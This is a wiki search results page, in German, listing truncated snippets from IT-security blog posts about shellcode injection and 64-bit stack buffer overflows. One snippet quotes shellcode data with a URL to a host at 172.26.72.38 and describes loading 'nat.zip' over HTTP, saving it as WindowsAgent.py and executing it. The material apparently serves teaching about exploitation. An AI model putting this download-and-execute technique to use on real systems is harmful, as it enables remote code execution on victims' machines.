http

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Shellcode Injection Part 3 @en:it-security:blog
6 Treffer, Zuletzt geändert:
can use a shellcode injection to load a file via HTTP and then execute it. \\ \\ ===== Code ===== ===... on WindowsAgent.py", 0 ;Zeile 192 / our URL db "http://172.26.72.38/nat.zip", 0 </code> \\ \\ === Crea... shellcode loads the file ''%%nat.zip%%'' from an HTTP server, saves it as ''%%WindowsAgent.py%%'' and t... ly: <code bash> cp payload.py nat.zip python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http:/
Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
1 Treffer, Zuletzt geändert:
. \\ \\ ==== Place shellcode ==== The Shellcode((http://shell-storm.org/shellcode/files/shellcode-77.ht
Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
3 Treffer, Zuletzt geändert:
''UID'' and ''EUID'' had to be set additionally ((http://disq.us/p/1klc7u2)), on the other hand ''/bin/sh'' no longer works in this way. ((http://disq.us/p/1n4ipc8)) Since there is a ''pop rdi... ' is a NOP function that shifts RSP by 8 bytes. ((http://disq.us/p/247r1cp)) \\ \\ ==== Finding offsets